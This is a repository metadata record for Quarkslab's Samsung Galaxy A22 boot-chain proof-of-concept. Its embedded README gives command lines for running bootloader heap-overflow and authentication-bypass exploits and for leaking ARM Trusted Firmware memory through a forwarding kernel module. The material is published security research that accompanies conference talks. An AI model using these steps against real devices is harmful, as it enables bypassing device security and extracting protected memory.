{"id":43496630,"url":"https://github.com/quarkslab/samsung-bootchain-poc","last_synced_at":"2026-02-03T10:38:37.259Z","repository":{"id":257961432,"uuid":"848238596","full_name":"quarkslab/samsung-bootchain-poc","owner":"quarkslab","description":"PoC associated to the talk \"Attacking Samsung Galaxy A* Boot Chain\" (https://www.blackhat.com/us-24/briefings/schedule/#attacking-samsung-galaxy-a-boot-chain-and-beyond-38526)","archived":false,"fork":false,"pushed_at":"2024-09-09T08:28:28.000Z","size":18,"stargazers_count":82,"open_issues_count":1,"forks_count":8,"subscribers_count":5,"default_branch":"main","last_synced_at":"2026-01-17T09:29:01.921Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/quarkslab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-27T11:52:37.000Z","updated_at":"2026-01-12T15:34:00.000Z","dependencies_parsed_at":"2024-10-17T05:31:51.974Z","dependency_job_id":null,"html_url":"https://github.com/quarkslab/samsung-bootchain-poc","commit_stats":null,"previous_names":["quarkslab/samsung-bootchain-poc"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/quarkslab/samsung-bootchain-poc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsams
ung-bootchain-poc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/quarkslab","download_url":"https://codeload.github.com/quarkslab/samsung-bootchain-poc/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29041866,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-03T10:09:22.136Z","status":"ssl_error","status_checked_at":"2026-02-03T10:09:16.814Z","response_time":96,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2026-02-03T10:38:36.699Z","updated_at":"2026-02-03T10:38:37.254Z","avatar_url":"https://github.com/quarkslab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Samsung Mediatek PoCs\n\nThis repository contains the exploits of 4 vulnerabilities\n- SVE-2023-2079/CVE-2024-20832 and SVE-2024-0234/CVE-2024-20865 impacting LittleKernel\n- and SVE-2023-2215/CVE-2024-20820 and CVE-2024-20021 impacting the ARM Trusted Firmware (or ATF).\n\nThe PoCs have been designed to work on a Samsung Galaxy A22 (SM-A225F/DSN), with the build number 
`TP1A.220624.014.A225FXXU6DWE3`.\n\nThe vulnerabilities are described in detail in our talk [\"Attacking the Samsung Galaxy A* Boot Chain\", presented at OffensiveCon 2024](https://www.youtube.com/watch?v=WJ7wkJn7l7w). A [whitepaper](https://www.sstic.org/media/SSTIC2024/SSTIC-actes/when_vendor1_meets_vendor2_the_story_of_a_small_bu/SSTIC2024-Article-when_vendor1_meets_vendor2_the_story_of_a_small_bug_chain-rossi-bellom_neveu.pdf) is also available for a similar talk we gave at SSTIC 2024.\n\n## Code Execution in LittleKernel\n\nThe `piece_montee_reloaded/` directory contains the PoCs for the LittleKernel vulnerabilities:\n- SVE-2023-2079/CVE-2024-20832: Heap overflow in the bootloader, exploited with `heap_overflow.py`\n- SVE-2024-0234/CVE-2024-20865: Authentication bypass in the bootloader, exploited with `this_is_fine.py` and `odin_sig_bypass.py`\n\nTo launch the exploit:\n\n```bash\n$ python this_is_fine.py all . --pit pit.bin --gpt gpt.bin --boot boot.bin --up_param up_param.bin -H \u003c/path/to/heimdall\u003e\n```\n\n### Prerequisites\n\nThis exploit uses [Heimdall](https://github.com/Benjamin-Dobell/Heimdall) to communicate with Odin.\n\nFor the attack to work, the following images from the device are required:\n- `pit.bin`\n\n\u003e It can be retrieved with Heimdall.\n\u003e \n\u003e ```bash\n\u003e $ heimdall download-pit --output pit.bin\n\u003e ```\n\n- `gpt.bin`\n\n\u003e It can be retrieved from a rooted device with `dd`, or with [MTKClient](https://github.com/bkerler/mtkclient).\n\u003e \n\u003e ```bash\n\u003e $ python $MTKCLIENT_DIR/mtk r gpt gpt.bin --preloader \u003cpath/to/preloader\u003e\n\u003e ```\n\n- `boot.bin`\n\n\u003e It must be patched using [Magisk](https://github.com/topjohnwu/Magisk) to get root privileges.\n\u003e \n\u003e The original image can be downloaded along with the stock firmware (https://samfw.com/firmware/SM-A225F), 
or dumped with MTKClient.\n\u003e \n\u003e ```bash\n\u003e $ python $MTKCLIENT_DIR/mtk r boot boot.img --preloader \u003cpath/to/preloader\u003e\n\u003e ```\n\n- `up_param.bin`\n\n\u003e Only the original image is required. It can also be retrieved along with the stock firmware or using MTKClient.\n\u003e \n\u003e ```bash\n\u003e $ python $MTKCLIENT_DIR/mtk r up_param up_param.img --preloader \u003cpath/to/preloader\u003e\n\u003e ```\n\n### Restore the device\n\n```bash\n$ python $MTKCLIENT_DIR/mtk w boot,gpt boot.img,gpt.bin --preloader \u003cpath/to/preloader\u003e\n```\n\n## Memory Leak in ARM Trusted Firmware\n\nThe `demo_atf` directory contains the PoCs for the ATF vulnerabilities:\n- SVE-2023-2215/CVE-2024-20820: Out-of-bounds read in ATF\n- CVE-2024-20021: Physical memory remapping in ATF\n\nWe implemented a short C program, `send_smc.c`, to exploit these two vulnerabilities. It simply sends the two vulnerable SMCs (`0x8200022a` for the out-of-bounds read, and `0xc2000526` for the mmap) to ATF. The `mmap_data` command maps a memory region (given a physical address and size) to the same virtual address, and `leak_data` leaks the content of a memory region given a virtual address.\n\n**Note** that the system is limited to 8 consecutive mmaps. An extra mmap, or an attempt to leak an address that has not been mapped, will **surely crash** the device.\n\n### Prerequisites\n\nOnly the kernel can send SMCs, 
which is why we implemented a dummy kernel module that forwards SMCs received from userland through IOCTLs.\n\n### Build\n\n```bash\n$ aarch64-linux-gnu-gcc -static send_smc.c -o send_smc # Compile the binary\n$ adb push send_smc /data/local/tmp # Push it to the device\n$ adb push smc_forward.ko.fixed /data/local/tmp # Push the kernel module\n```\n\n### Usage\n\nOn the device:\n\n```bash\n$ su\n# cd /data/local/tmp\n# insmod smc_forward.ko.fixed\n# ./send_smc mmap_data 0x7c200000 0x600000\n# ./send_smc leak_data 0x7c200000 0x600000 \u003e /data/local/tmp/dump.bin\n```\n\n# Contributors\n\n- Maxime Rossi Bellom\n- Raphael Neveu\n- Gabrielle Viala\n- Damiano Melotti","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquarkslab%2Fsamsung-bootchain-poc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fquarkslab%2Fsamsung-bootchain-poc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquarkslab%2Fsamsung-bootchain-poc/lists"}